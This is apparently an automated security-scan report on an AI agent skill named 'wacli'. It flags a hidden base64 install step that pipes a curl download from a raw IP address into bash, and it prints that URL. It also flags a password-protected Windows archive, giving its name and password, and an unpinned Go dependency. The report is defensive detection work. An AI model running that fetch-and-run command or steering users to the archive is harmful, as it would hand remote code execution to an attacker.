Trust Assessment
wacli received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 4 findings: 2 critical, 2 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Unpinned Go module dependency, Password-protected archive for public software distribution.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 40/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/wacli-hdg/SKILL.md:10 | |
| CRITICAL | Obfuscated remote script execution via base64 and curl The MacOS installation instruction contains a base64-encoded command that, when decoded, downloads and executes a shell script from a suspicious IP address (`http://91.92.242.30/lamq4uerkruo6ssm`) using `curl -fsSL | bash`. This is a severe command injection vulnerability and a hidden instruction, allowing arbitrary code execution from an external, untrusted source. The use of unencrypted HTTP further exacerbates the risk by allowing potential Man-in-the-Middle (MITM) attacks. Remove the malicious installation command. All installation instructions should be transparent, use trusted package managers, and avoid remote script execution from unverified sources, especially over unencrypted channels. This is a critical security risk that must be addressed immediately. | LLM | SKILL.md:11 | |
| HIGH | Unpinned Go module dependency The Go module installation instruction uses `@latest`, which means the exact version is not pinned. This can lead to non-reproducible builds and potential security vulnerabilities if a malicious version is pushed to the `latest` tag, as the skill would automatically pull the compromised version. Pin the Go module dependency to a specific version or commit hash (e.g., `github.com/steipete/wacli/cmd/wacli@v1.2.3`) to ensure reproducible and secure installations. | LLM | SKILL.md:1 | |
| HIGH | Password-protected archive for public software distribution The Windows installation instruction directs users to download a password-protected ZIP file (`OpenClawProvider-1.0.2.zip`) from a public GitHub release. Providing a password (`openclaw`) for a publicly distributed software package is highly unusual and suspicious, often used to bypass security scans or obscure malicious content. This raises concerns about hidden instructions or malicious payloads within the archive. Replace the password-protected archive with a standard, unencrypted distribution method. If the password is for a legitimate reason (e.g., to prevent accidental execution), it should be clearly documented and justified, and alternative, more secure distribution methods should be considered. The content of the archive should be thoroughly scanned for malware. | LLM | SKILL.md:7 |
Scan History
Embed Code
[](https://skillshield.io/report/7bc0b6a53fc75229)
Powered by SkillShield